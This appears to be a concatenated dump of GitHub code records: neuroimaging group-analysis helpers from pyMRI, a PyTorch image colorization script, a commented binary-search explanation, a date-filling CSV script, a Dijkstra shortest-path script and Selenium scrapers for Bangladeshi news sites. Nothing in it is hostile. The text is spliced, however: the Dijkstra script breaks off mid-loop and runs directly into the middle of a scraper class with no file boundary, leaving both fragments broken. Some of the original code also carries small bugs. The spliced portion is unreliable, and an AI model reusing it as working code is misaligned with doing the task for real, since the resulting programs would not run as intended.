Image(os.path.join(input_stats, \"mean_FA_skeleton_mask\")).cp(os.path.join(input_stats, \"mean_\" + mod + \"_skeleton_mask\"))\n Image(os.path.join(input_stats, \"mean_FA_skeleton\")).cp(os.path.join(input_stats, \"mean_\" + mod + \"_skeleton_mask\"))\n\n if proc:\n curr_dir = os.getcwd()\n os.chdir(input_folder)\n\n for mod in modalities:\n print(\"preprocessing dtifit_\" + mod + \" images\")\n rrun(\"tbss_non_FA \" + mod)\n\n os.chdir(curr_dir)\n\n if cleanup:\n # shutil.rmtree(os.path.join(input_folder, \"FA\")) #\n shutil.rmtree(os.path.join(input_folder, \"L1\"))\n shutil.rmtree(os.path.join(input_folder, \"L23\"))\n shutil.rmtree(os.path.join(input_folder, \"MD\"))\n\n # read a matrix file (not a classical subjects_data file) and add total ICV as last column\n # here it assumes [integer, integer, integer, integer, integer, float4]\n def add_icv_2_data_matrix(self, grouplabel_or_subjlist, input_data_file=None, sess_id=1):\n\n if not os.path.exists(input_data_file):\n print(\"ERROR in add_icv_2_data_matrix, given data_file does not exist\")\n return\n\n subjects = self.project.get_subjects_labels(grouplabel_or_subjlist)\n icvs = self.project.get_subjects_icv(grouplabel_or_subjlist, sess_id)\n\n nsubj = len(subjects)\n ndata = len(icvs)\n if nsubj != ndata:\n print(\"ERROR in create_vbm_spm_stats. 
number of given subjects does not correspond to data number\")\n return\n\n b = numpy.hstack((input_data_file, icvs))\n numpy.savetxt(input_data_file, b, ['%1.0f', '%1.0f', '%5.0f', '%5.0f', '%5.0f', '%2.4f'], '\\t')\n\n # read xtract's stats.csv file of each subject in the given list and create a tabbed file (ofp) with given values/tract\n # calls the subject routine\n def xtract_export_group_data(self, subjects_list, ofp, tracts=None, values=None, ifn=\"stats.csv\"):\n\n self.subjects_list = subjects_list\n if len(self.subjects_list) == 0:\n print(\"ERROR in xtract_export_group_data, given subjs params is neither a string nor a list\")\n return\n\n if tracts is None:\n tracts = self._global.dti_xtract_labels\n\n if values is None:\n values = [\"mean_FA\", \"mean_MD\"]\n\n file_str = \"subj\\t\"\n for tr in tracts:\n for v in values:\n file_str = file_str + tr + \"_\" + v + \"\\t\"\n file_str = file_str + \"\\n\"\n\n for subj in self.subjects_list:\n file_str = file_str + subj.dti.xtract_read_file(tracts, values, ifn)[0] + \"\\n\"\n\n with open(ofp, 'w', encoding='utf-8') as f:\n f.write(file_str)\n\n # endregion =================================================================================================================================================\n\n # ---------------------------------------------------\n #region MELODIC\n @staticmethod\n def group_melodic(out_dir_name, subjects_list, tr):\n\n if os.path.exists(out_dir_name):\n os.removedirs(out_dir_name)\n\n os.makedirs(out_dir_name)\n\n subjs = \"\"\n bgimages = \"\"\n masks = \"\"\n missing_data = \"\"\n\n for subj in subjects_list:\n\n if subj.rs_final_regstd_image.exist and subj.rs_final_regstd_bgimage.exist and subj.rs_final_regstd_bgimage.exist:\n subjs = subjs + \" \" + subj.rs_final_regstd_image\n bgimages = subjs + \" \" + subj.rs_final_regstd_bgimage\n masks = masks + \" \" + subj.rs_final_regstd_mask\n else:\n missing_data = missing_data + subj.label + \" \"\n\n if len(missing_data) > 0:\n print(\"group melodic failed. 
the following subjects does not have all the needed images:\")\n print(missing_data)\n return\n\n print(\"creating merged background image\")\n\n rrun(\"fslmerge -t \" + os.path.join(out_dir_name, \"bg_image\") + \" \" + bgimages)\n\n # echo \"merging background image\"\n # $FSLDIR/bin/fslmerge -t $OUTPUT_DIR/bg_image $bglist\n # $FSLDIR/bin/fslmaths $OUTPUT_DIR/bg_image -inm 1000 -Tmean $OUTPUT_DIR/bg_image -odt float\n # echo \"merging mask image\"\n # $FSLDIR/bin/fslmerge -t $OUTPUT_DIR/mask $masklist\n #\n # echo \"start group melodic !!\"\n # $FSLDIR/bin/melodic -i $filelist -o $OUTPUT_DIR -v --nobet --bgthreshold=10 --tr=$TR_VALUE --report --guireport=$OUTPUT_DIR/report.html --bgimage=$OUTPUT_DIR/bg_image -d 0 --mmthresh=0.5 --Ostats -a concat\n #\n # echo \"creating template description file\"\n # template_file=$GLOBAL_SCRIPT_DIR/melodic_templates/$template_name.sh\n #\n # echo \"template_name=$template_name\" > $template_file\n # echo \"TEMPLATE_MELODIC_IC=$OUTPUT_DIR/melodic_IC.nii.gz\" >> $template_file\n # echo \"TEMPLATE_MASK_IMAGE=$OUTPUT_DIR/mask.nii.gz\" >> $template_file\n # echo \"TEMPLATE_BG_IMAGE=$OUTPUT_DIR/bg_image.nii.gz\" >> $template_file\n # echo \"TEMPLATE_STATS_FOLDER=$OUTPUT_DIR/stats\" >> $template_file\n # echo \"TEMPLATE_MASK_FOLDER=$OUTPUT_DIR/stats\" >> $template_file\n # echo \"str_pruning_ic_id=() # valid RSN: you must set their id values removing 1: if in the html is the 6th RSN, you must write 5!!!!!!\" >> $template_file\n # echo \"str_arr_IC_labels=()\" >> $template_file\n # echo \"declare -a arr_IC_labels=()\" >> $template_file\n # echo \"declare -a arr_pruning_ic_id=()\" >> $template_file\n #\n pass\n\n #endregion\n\n # ---------------------------------------------------\n #region SBFC\n @staticmethod\n def group_sbfc(grouplabel_or_subjlist, firstlvl_fn, regressors, input_fsf, odp, ofn=\"mult_cov\", data_file=None,\n create_model=True, group_mean_contrasts=1, cov_mean_contrasts=2, compare_covs=False, ofn_postfix=\"\"):\n pass\n\n #endregion\n\n # ====================================================================================================================================================\n #region TBSS\n # ====================================================================================================================================================\n # run tbss for FA\n # uses the union between template FA_skeleton and xtract's main tracts to clusterize a tbss output\n def tbss_clusterize_results_by_atlas(self, tbss_result_image, out_folder, log_file=\"overlap.txt\", tracts_labels=None, tracts_dir=None, thr=0.95):\n\n try:\n if tracts_labels is None:\n tracts_labels = self._global.dti_xtract_labels\n\n if tracts_dir is None:\n tracts_dir = self._global.dti_xtract_dir\n\n log = os.path.join(out_folder, log_file)\n tot_voxels = 0\n classified_tracts = []\n os.makedirs(out_folder, exist_ok=True)\n\n # ----------------------------------------------------------------------------------------------------------\n # threshold tbss input, copy to out_folder, get number of voxels\n name = os.path.basename(tbss_result_image)\n thr_input = Image(os.path.join(out_folder, name))\n rrun(\"fslmaths \" + tbss_result_image + \" -thr \" + str(thr) + \" -bin \" + thr_input)\n original_voxels = thr_input.get_nvoxels()\n\n out_str = \"\"\n for tract in tracts_labels:\n tr_img = Image(os.path.join(tracts_dir, \"FMRIB58_FA-skeleton_1mm_\" + tract + \"_mask\"))\n tract_tot_voxels = tr_img.get_nvoxels()\n out_img = Image(os.path.join(out_folder, \"sk_\" + tract))\n 
rrun(\"fslmaths \" + thr_input + \" -mas \" + tr_img + \" \" + out_img)\n\n res = out_img.get_nvoxels()\n if res > 0:\n classified_tracts.append(out_img)\n else:\n out_img.rm()\n\n tot_voxels = tot_voxels + res\n out_str = out_str + tract + \"\\t\" + str(res) + \" out of \" + str(tract_tot_voxels) + \" voxels = \" + str(round((res * 100) / tract_tot_voxels, 2)) + \" %\" + \"\\n\"\n\n # ------------------------------------------------\n # create unclassified image\n unclass_img = Image(os.path.join(out_folder, \"unclass_\" + os.path.basename(out_folder)))\n cmd_str = \"fslmaths \" + thr_input\n for img in classified_tracts:\n cmd_str = cmd_str + \" -sub \" + img + \" -bin \"\n cmd_str = cmd_str + unclass_img\n rrun(cmd_str)\n unclass_vox = unclass_img.get_nvoxels()\n\n # ----------------------------------------------------------------------------------------------------------\n # write log file\n out_str = out_str + \"\\n\" + \"\\n\" + \"tot voxels = \" + str(tot_voxels) + \" out of \" + str(original_voxels) + \"\\n\"\n out_str = out_str + \"unclassified image has \" + str(unclass_vox)\n with open(log, 'w', encoding='utf-8') as f:\n f.write(out_str)\n\n except Exception as e:\n print(e)\n\n # clust_res_dir: output folder of tbss's results clustering\n # datas is a tuple of two elements containing a matrix of values and subj_labels\n # returns tracts_data\n @staticmethod\n def tbss_summarize_clusterized_folder(in_clust_res_dir, datas, data_labels, tbss_folder, modality=\"FA\",\n subj_img_postfix=\"_FA_FA_to_target\", ofn=\"scatter_tracts_\") -> list:\n\n ndata = len(data_labels)\n whatdata = datas[0][0]\n if isinstance(whatdata, list):\n if len(whatdata) != ndata:\n print(\"ERROR in tbss_summarize_clusterized_folder: number of data columns differ from labels....exiting\")\n return\n else:\n if ndata != 1:\n print(\"ERROR in tbss_summarize_clusterized_folder: more than one labels for one column data....exiting\")\n return\n\n out_folder = os.path.join(tbss_folder, \"results\")\n ifn = get_dirname(in_clust_res_dir)\n subjects_images = os.path.join(tbss_folder, modality) # folder containing tbss subjects' folder of that modality\n\n if modality == \"FA\":\n subj_img_postfix = \"_FA_FA_to_target\"\n else:\n subj_img_postfix = \"_FA_to_target_\" + modality\n\n tracts_labels = []\n\n # compose header\n str_data = \"subj\"\n for lab in data_labels:\n str_data = str_data + \"\\t\" + lab\n\n for entry in os.scandir(in_clust_res_dir):\n if not entry.name.startswith('.') and not entry.is_dir():\n if entry.name.startswith(\"sk_\"):\n lab = Image(entry.name[3:]).fpathnoext\n tracts_labels.append(lab)\n str_data = str_data + \"\\t\" + lab\n str_data = str_data + \"\\n\"\n\n tracts_data = []\n [tracts_data.append([]) for _ in range(len(tracts_labels))]\n nsubj = len(datas[0])\n for i in range(nsubj):\n subj_label = datas[1][i]\n in_img = os.path.join(subjects_images, subj_label + \"-dti_fit\" + subj_img_postfix)\n subj_img = Image(in_img, must_exist=True, msg=\"Error in tbss_summarize_clusterized_folder, subj image (\" + in_img + \"_masked\" + \") is missing...exiting\")\n subj_img_masked = Image(subj_img + \"_masked\")\n n_tracts = 0\n str_data = str_data + subj_label\n for id,lab in enumerate(data_labels):\n str_data = str_data + \"\\t\" + str(datas[0][i][id])\n\n for entry in os.scandir(in_clust_res_dir):\n if not entry.name.startswith('.') and not entry.is_dir():\n if entry.name.startswith(\"sk_\"):\n subj_img.mask_image(entry.path, subj_img_masked)\n val = subj_img_masked.get_image_mean()\n 
subj_img_masked.rm()\n\n str_data = str_data + \"\\t\" + str(val)\n tracts_data[n_tracts].append(val)\n n_tracts = n_tracts + 1\n str_data = str_data + \"\\n\"\n\n res_file = os.path.join(out_folder, ofn + ifn + \"_\" + listToString(data_labels, separator='_') + \".dat\")\n\n with open(res_file, \"w\") as f:\n f.write(str_data)\n\n return [tracts_labels, tracts_data]\n\n # create a new tbss analysis folder (only stats one), filtering an existing analysis folder\n # vols2keep: 0-based list of indices to keep\n @staticmethod\n def create_analysis_folder_from_existing(src_folder, new_folder, vols2keep, modalities=None):\n\n if modalities is None:\n modalities = [\"FA\", \"MD\", \"L1\", \"L23\"]\n\n # create new folder\n new_stats_folder = os.path.join(new_folder, \"stats\")\n os.makedirs(new_stats_folder, exist_ok=True)\n\n for mod in modalities:\n orig_image = Image(os.path.join(src_folder, \"stats\", \"all_\" + mod + \"_skeletonised\"), must_exist=True, msg=\"GroupAnalysis.create_analysis_folder_from_existing\")\n dest_image = os.path.join(new_folder, \"stats\", \"all_\" + mod + \"_skeletonised\")\n\n orig_mean_image = Image(os.path.join(src_folder, \"stats\", \"mean_\" + mod + \"_skeleton_mask\"), must_exist=True, msg=\"GroupAnalysis.create_analysis_folder_from_existing\")\n dest_mean_image = os.path.join(new_folder, \"stats\", \"mean_\" + mod + \"_skeleton_mask\")\n\n orig_image.filter_volumes(vols2keep, dest_image)\n\n orig_mean_image.cp(dest_mean_image)\n\n #endregion","repo_name":"albaspazio/pyMRI","sub_path":"group/GroupAnalysis.py","file_name":"GroupAnalysis.py","file_ext":"py","file_size_in_byte":22174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1117320055","text":"\nimport numpy as np\nimport cv2\nimport scipy.misc\nfrom skimage import color\nimport torch\nfrom IPython import embed\nimport argparse\nfrom scipy.ndimage.interpolation import zoom\nimport matplotlib.pyplot as plt\n\nimport util\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--use_gpu', action='store_true', help='whether to use GPU')\n\n# model parameters\nparser.add_argument('--arch', type=str, default='siggraph', help='[siggraph] or [drn_d_22]')\nparser.add_argument('--img_path', type=str, default='./imgs/migrant_mother.jpg', help='image to process')\nparser.add_argument('--model_path', type=str, default='./weights/caffemodel_mask01_rec.pth', help='model weights')\nparser.add_argument('--hint_ab_path', type=str, default=None, help='hints saved off as [2 x Hproc x Wproc]')\nparser.add_argument('--hint_mask_path', type=str, default=None, help='hint masked saved off as [2 x Hproc x Wproc]')\nparser.add_argument('--base_path', type=str, default='./', help='base path to save and load images')\n\n# classification point\nparser.add_argument('--hw_class', type=float, default=(50,120), nargs='+', help='point to look at for predicted distribution')\n# h,w = 50, 120 # mother's face\n# h,w = 30, 45 # point in background\n\n# constants\nparser.add_argument('--l_norm', type=float, default=100., help='L normalization')\nparser.add_argument('--l_cent', type=float, default=50., help='L center')\nparser.add_argument('--ab_norm', type=float, default=110., help='ab normalization') \nparser.add_argument('--mask_cent', type=float, default=0., help='hint mask centering')\nparser.add_argument('--HW_proc', type=int, default=(270,180), nargs='+', help='dimension to process image')\nparser.add_argument('--A', type=int, default=23, help='number of 
bins')\nparser.add_argument('--ab_step', type=int, default=10., help='ab increments when discretizing')\n\n\nopt = parser.parse_args()\n\n# ***** COLOR INPUT POINTS *****\nH_proc, W_proc = opt.HW_proc\nif(opt.hint_ab_path is None):\n\tin_ab = np.zeros((H_proc, W_proc, 2))\nelse:\n\t# in_ab = np.load(opt.hint_ab_path).transpose((1,2,0)) # ./imgs/migrant_mother/im_ab.npy\n\tin_ab = np.load(opt.hint_ab_path)\n\nif(opt.hint_mask_path is None):\n\tin_mask = np.zeros((H_proc, W_proc, 1))\nelse:\n\t# in_mask = 1.*np.load(opt.hint_mask_path).transpose((1,2,0)) # ./imgs/migrant_mother/im_mask.npy\n\tin_mask = 1.*np.load(opt.hint_mask_path)\n\nif(opt.arch=='siggraph'):\n\timport models.siggraph\n\tcolorizer = models.siggraph.SIGGRAPHGenerator()\nelif(opt.arch=='drn_d_22'):\n\timport models.drnseg\n\tcolorizer = models.drnseg.DRNSeg(model_name='drn_d_22')\n\nbase_path = opt.base_path\nprint('Loading from [%s]'%opt.model_path)\n# embed()\na = torch.load(opt.model_path)\nkeys_colorizer = colorizer.state_dict().keys()\nkeys_load = a.keys()\nprint(len(keys_colorizer))\nprint(len(keys_load))\nprint('Non-matching keys', np.setdiff1d(keys_colorizer, keys_load), np.setdiff1d(keys_load, keys_colorizer))\nprint('**If above list is exessively long, there is probably an error**')\ncolorizer.load_state_dict(a,strict=False)\n\nif(opt.use_gpu):\n\tcolorizer.cuda()\ncolorizer.eval()\n\n# ***** LOAD IMAGE, PREPARE DATA *****\nimg_orig = cv2.imread(opt.img_path)[:,:,::-1]\n(H_orig,W_orig) = img_orig.shape[:2]\nprint('[%ix%i] Original resolution'%(H_orig, W_orig))\nprint('[%ix%i] Processed resolution'%(H_proc,W_proc))\n\n# resize to processing size, take L channel for input\nimg_rs = cv2.resize(img_orig, (W_proc, H_proc), interpolation=cv2.INTER_CUBIC)\nimg_rs_lab = color.rgb2lab(img_rs)\nimg_rs_l = img_rs_lab[:,:,[0]]\nimg_rs_l_norm = (img_rs_l-opt.l_cent)/opt.l_norm # normalized\n\n# normalize & center input ab, input mask\nin_ab_norm = in_ab/opt.ab_norm\nin_mask_norm = in_mask - opt.mask_cent\n\n# ***** RUN MODEL *****\nout_class, out_reg = colorizer.forward(util.np2tens(img_rs_l_norm,use_gpu=opt.use_gpu), \n\tutil.np2tens(in_ab_norm,use_gpu=opt.use_gpu), \n\tutil.np2tens(in_mask_norm,use_gpu=opt.use_gpu))\nout_class = out_class.data # 1 x AB x H_proc x W_proc, probability distribution at every spatial location (h,w) of possible colors\nout_reg = out_reg.data # 1 x 2 x H_proc x W_proc\n\nout_ab_norm = util.tens2np(out_reg)\nout_ab = out_ab_norm*opt.ab_norm # un-normalize\n\n# ***** CONCATENATE WITH INPUT *****\n# concatenate with L channel, convert to RGB, save\nout_lab = np.concatenate((img_rs_l,out_ab),axis=2)\nout_rgb = util.lab2rgb_clip(out_lab)\n\n# ***** COMPUTE UNCERTAINTY *****\nout_entropy = -torch.sum(out_class*torch.log(out_class),dim=1,keepdim=True)\n\n# for visualization\nin_ab_lab_flat = np.concatenate((in_mask*50, in_ab), axis=2)\n# in_ab_lab_flat = np.concatenate((in_mask, in_ab), axis=2)\nin_ab_rgb_flat = util.lab2rgb_clip(in_ab_lab_flat)\n\nin_ab_lab_img = np.concatenate((img_rs_l, in_ab), axis=2)\nin_ab_rgb_img = util.lab2rgb_clip(in_ab_lab_img)\n\n\n\nfig = plt.figure(figsize=(18,6))\nplt.subplot(1,4,1)\nplt.imshow(in_mask[:,:,0],clim=(0,1),cmap='gray')\nplt.title('Input hint mask')\nplt.axis('off')\n\nplt.subplot(1,4,2)\nplt.imshow(in_ab_rgb_flat)\nplt.title('Input hints')\nplt.axis('off')\n\nplt.subplot(1,4,3)\nplt.imshow(in_ab_rgb_img)\nplt.title('Input (grayscale + hints)')\nplt.axis('off')\n\nplt.subplot(1,4,4)\nplt.imshow(out_rgb)\nplt.title('Output')\nplt.axis('off')\ncv2.imwrite(base_path 
+ 'colorized_output.png', out_rgb)\n\nfig.tight_layout()\n\nplt.savefig(base_path + 'tmp.png')\n\n# plt.show()\n\n\n\n\n# ***** COLOR DISTRIBUTION PREDICTION *****\n# color bins for color classification and output recommendations\nA = opt.A # the ab colormap is divided up into 23x23 color bins\nAB = A**2 # there are 23*23=529 color bins in total\nab_step = opt.ab_step # spacing between discretized color bins\nab_edge = opt.ab_norm + ab_step/2\na_range = np.arange(-opt.ab_norm, opt.ab_norm+ab_step, step=ab_step)\nbbs, aas = np.meshgrid(a_range, a_range)\n# abs_norm = abs/ab_norm # 529x2, bin centers normalized from [-1, +1]\nab_labs = np.concatenate((50+np.zeros((A,A,1)),aas[:,:,None],bbs[:,:,None]),axis=2)\nab_rgbs = util.lab2rgb_clip(ab_labs)\n\n# capture the probability distribution at a single point\nh,w = opt.hw_class\nout_class_point = out_class[0,:,h,w] # 529, probability distribution over discretized space\n\n# PLOT RESULTS\n# show queried point on original image\nfig = plt.figure(figsize=(18,6))\nplt.subplot(1,4,1)\nplt.imshow(out_entropy.cpu().numpy()[0,0,:,:],clim=(0,5),cmap='hot')\nplt.plot(w,h,'wo', markersize=14)\n# plt.colorbar()\nplt.title('Prediction Entropy (White O)')\nplt.axis('off')\n\nplt.subplot(1,4,2)\nplt.imshow(in_ab_rgb_img)\nplt.plot(w,h,'wo', markersize=14)\nplt.title('Input + Queried point (White O)')\nplt.axis('off')\n\n# plot probability distribution over ab colorspace\nplt.subplot(1,4,3)\nplt.imshow(out_class_point.cpu().reshape(A,A).numpy(), \n\textent=[-ab_edge,ab_edge,ab_edge,-ab_edge], cmap='hot')\nplt.xlabel('b')\nplt.ylabel('a')\nplt.title('Predicted distribution')\n\nplt.subplot(1,4,4)\nplt.imshow(ab_rgbs, \n\textent=[-ab_edge,ab_edge,ab_edge,-ab_edge])\nplt.xlabel('b')\nplt.ylabel('a')\nplt.title('ab colors (L=50)')\n\nfig.tight_layout()\nplt.show()\n\n","repo_name":"irisliucy/colorization-pytorch-simple-PSE","sub_path":"run_model.py","file_name":"run_model.py","file_ext":"py","file_size_in_byte":6930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21659967610","text":"# 1. Can you explain in detail what this function does? \ndef solve(a, d):\n l, r = 0, len(a)\n while l < r:\n m = (l + r) // 2\n if a[m] == d + m:\n l = m + 1\n else: r = m\n return l + d\n\n# Detailed Code Explanation\n\"\"\"\n# 1. line 1 declares function solve. solve tkaes two arguments, a, an array, and d, an integer. a = array, d = decimal\n# 2. line 2, l is initialzed to 0 and r is initialized to the length of list a\n# l and r are used to create a search range within list a \n# l startes at 0 which is the starting point of the list. r is the index that marks the end of the list, but it's one over.\n# That is last index + 1. l = left, r = right\n# 3. A while loop in started on line 3 and runs provided the leftmost index is lower than then right most index\n# this ensures that there is a valid search range to consider. If l is no longer less than r, then, there is nothing to search for\n# 4. On line 4, variable m is initialized and defined and it's used to calculate the middle index of the search range\n# That is left most + right most divided by 2. The `//` is used to ensure that m is an integer.\n# 5 / 2 returns 2.5 while 5 // 2 returns 2\n# m = middle\n# 5. 
Line 5 checks if the element at index 'm' of the array is equal to d + m (decimal + middle)\n# You are essentially checking if element at index m of array is the number you are searching for + the middle index number\n# The reason for this step will be clearer soon\n# 6. In line 6, if element at index m of array is equal to d + m, it means that the current element is positioned as expected in a sorted sequence\n# That means that the elements to the left of the middle are also correctly positioned. So we need to narrow our search to the right part of m\n# That's why l, left is shifted to one index after the middle; l = m + 1\n# 7. Line 7: Otherwise, if a[m] is not equal to d + m, it means the current element is not in the correct position\n# And elements before it (to the left) are also likely out of place\n# So, we should continue the search on the left side of m\n# r, right, is now brought down to m, the middle, from its top position at the end of the list\n# The first iteration of the loop ends and the list to be searched is halved\n# The loop continues, so does the halving, till l is equal to r\n# The function returns l + d, which is also the same as r + d.\n# This is essentially the count of correctly positioned elements + d, which accounts for any offset introduced by the d value\n\n# The function can be re-written thus for better readability\n\ndef binary_search(array, decimal):\n left = 0\n right = len(array)\n while left < right:\n mid = (left + right) // 2\n if array[mid] == decimal + mid:\n left = mid + 1\n else:\n right = mid\n return left + decimal\n\"\"\"","repo_name":"dhev-wisdom/raspberry_et_al","sub_path":"binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"14375175919","text":"from datetime import timedelta, date\nimport pandas as pd\nimport numpy as np\nimport csv\n\ndef daterange(start_date, end_date):\n for n in range(int((end_date - start_date).days)):\n yield start_date + timedelta(n)\n\nwith open('data.csv', newline='') as csvfile:\n data = list(csv.reader(csvfile))\n\ndatos = []\nfor i in range(1,len(data)):\n datos.append(str(data[i][0]))\n\nstart_date = date(2018, 1, 1)\nend_date = date(2020, 9, 4)\ncont = 0\ncati=\"\"\nfor single_date in daterange(start_date, end_date):\n cati+=str(single_date.strftime(\"%Y-%m-%d\"))\n cati+=str(\",\")\n if str(single_date.strftime(\"%Y-%m-%d\")) in datos:\n cont+=1\n cati+=str(data[cont][1])\n else:\n cati+=str(\"0\")\n #cati+=\",\"+str(single_date.weekday())+\",\"\n #cati+=str(single_date.strftime(\"%m\"))\n cati+=\"\\n\"\nf = open(\"datafinal.csv\",\"w+\")\nprint(cati)\nf.write(cati)\nf.close()\n","repo_name":"pedroangelalvarez/combiche","sub_path":"corrector.py","file_name":"corrector.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"18599194209","text":"import sys\nimport heapq\nN,E=map(int,sys.stdin.readline().split(\" \"))\nINF=sys.maxsize\ngraph={}\nfor i in range(1,N+1):\n graph[i]={}\nfor i in range(E):\n row,col,distance=map(int,sys.stdin.readline().split(\" \"))\n graph[row][col]=distance\n graph[col][row]=distance\n\n\nv1,v2=map(int,sys.stdin.readline().split(\" \"))\n\ndef dijikstra(graph,start):\n queue=[]\n distances={}\n for i in range(1,N+1):\n distances[i]=INF\n distances[start]=0\n heapq.heappush(queue,[distances[start],start])\n while queue:\n
current_distance,current_vertex=heapq.heappop(queue)\n\n if current_distance>distances[current_vertex]:\n continue\n\n for key,val in graph[current_vertex].items():\n distance=current_distance+val\n if distance<distances[key]:\n distances[key]=distance\n heapq.heappush(queue,[distance,key])\n return distances\n\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_ntv(self, pages=1, keep_content=False):\n print(\"Scraping from NTV\")\n self.driver.get('https://www.ntvbd.com/' + \"search/google?s=\" + self.search_key)\n\n scrap_df = []\n i = 1\n while i <= pages:\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@class='gs-title'][@href]\")\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = scan_page_ntv(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n next_page = self.driver.find_element(By.XPATH, \"//div[@class='gsc-cursor']\")\n next_page.find_element(By.XPATH, f\"//div[@aria-label='Page {i + 1}']\").click()\n\n except:\n print(\"End of NTV search!\")\n break\n i += 1\n sleep(1)\n\n print(\"End of NTV search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n # def scan_page_bhorerkagoj_sel(self, link, keep_content=True):\n # date_id = link.find('bhorerkagoj.com/') + len('bhorerkagoj.com/')\n # date = link[date_id:date_id + 10]\n #\n # self.driver.get(link)\n # headline = self.driver.find_element(By.XPATH, \"//h2[@class='title']\")\n # section = self.driver.find_element(By.XPATH, \"//a[@rel='category tag']\")\n # source = self.driver.find_element(By.XPATH, \"//p[@class='name']\")\n # try:\n #\n # data_dict = {\n # 'newspaper': 'bhorerkagoj',\n # 'link': link,\n # 'language': 'bn',\n # 'date': date,\n # 'section': section.text.strip() if section else '',\n # 'source': source.text.strip() if source else '',\n # 'headline': headline.text.strip()\n # }\n # if keep_content:\n # description = driver.find_element(By.XPATH, \"//div[@id='content-p']\")\n # data_dict['description'] = description.text.strip()\n # except:\n # print(\"Error in extracting information or advertisement error.\")\n # self.driver.back()\n #\n # return data_dict\n\n\n\n def search_bhorer_kagoj(self, pages=1, keep_content=False):\n print(\"Scraping from BHORER KAGOJ\")\n self.driver.get('https://www.bhorerkagoj.net' + \"?s=\" + self.search_key)\n\n scrap_df = []\n i = 1\n while i <= pages:\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='col-sm-6 col-xs-12']/a[@href]\")\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = scan_page_bhorerkagoj(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n next_page = self.driver.find_element(By.XPATH, \"//a[@title='next']\")\n next_page_url = next_page.get_attribute('href')\n self.driver.get(next_page_url)\n except:\n print(\"End of Bhorerkagoj search!\")\n break\n i += 1\n\n print(\"End of Bhorerkagoj search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_prothomalo(self, pages=1, keep_content=False):\n print(\"Scraping from Prothom Alo\")\n self.driver.get('https://www.prothomalo.com/' + \"search?q=\" + self.search_key)\n\n scrap_df = []\n i = 1\n next_j = 0\n while i <= pages:\n search_links = self.driver.find_elements(By.XPATH, \"//a[@class='card-with-image-zoom'][@href]\")\n\n for j, element in 
enumerate(search_links[next_j:]):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {next_j + (j + 1)}\")\n\n # Scrap from news main function\n page_dict = scan_page_prothomalo(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n next_j += j + 1\n # print(next_j)\n next_page_element = WebDriverWait(self.driver, 5).until(\n EC.visibility_of_element_located((By.XPATH, \"//span[text()='আরও']\")))\n self.driver.execute_script(\"return arguments[0].scrollIntoView(true);\", next_page_element)\n\n next_page = self.driver.find_element(By.XPATH, \"//span[text()='আরও']\")\n next_page.click()\n print(\"Next portion\")\n except:\n print(\"End of ProthomAlo search!\")\n break\n i += 1\n sleep(0.5)\n\n print(\"End of Prothomalo search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_kalerkantho(self, pages=1, keep_content=False):\n print(\"Scraping from Kalerkantho\")\n self.driver.get(\n \"http://www.kalerkantho.com/\" + \"home/search?cx=partner-pub-0600503450204720%3A2337922458&cof=FORID%3A10&ie=UTF-8&q=\" + self.search_key)\n scrap_df = []\n i = 1\n while i <= pages:\n try:\n WebDriverWait(self.driver, 5).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='gs-title']/a[@class ='gs-title'][@href]\")))\n print(\"Search results ready!!\")\n except TimeoutException:\n gsc_link = self.driver.find_elements(By.XPATH, \"//iframe[@name='googleSearchFrame']\")\n self.driver.get(gsc_link[0].get_attribute('src'))\n print(\"Timed out! Trying new approach\")\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@class='gs-title'][@href]\")\n # print(search_links)\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = scan_page_kaler_kantho(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n # Go to next page\n try:\n next_page = self.driver.find_element(By.XPATH, \"//div[@class='gsc-cursor']\")\n next_page.find_element(By.XPATH, f\"//div[@aria-label='Page {i + 1}']\").click()\n except:\n print(\"End of KalerKantho search!\")\n break\n i += 1\n sleep(1)\n\n print(\"End of KalerKantho search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_jaijaidin(self, pages=1, keep_content=False):\n print(\"Scraping from Jaijaidin\")\n self.driver.get(\n 'https://www.jaijaidinbd.com/search/google/?q=' + self.search_key + '&cx=partner-pub-5450504941871955%3A3787426415&cof=FORID%3A10&ie=UTF-8&sa=Search&sort=date')\n\n scrap_df = []\n i = 1\n while i <= pages:\n try:\n WebDriverWait(self.driver, 5).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='gs-title']/a[@class ='gs-title'][@href]\")))\n print(\"Search results ready!!\")\n except TimeoutException:\n gsc_link = self.driver.find_elements(By.XPATH, \"//iframe[@name='googleSearchFrame']\")\n self.driver.get(gsc_link[0].get_attribute('src'))\n print(\"Timed out! 
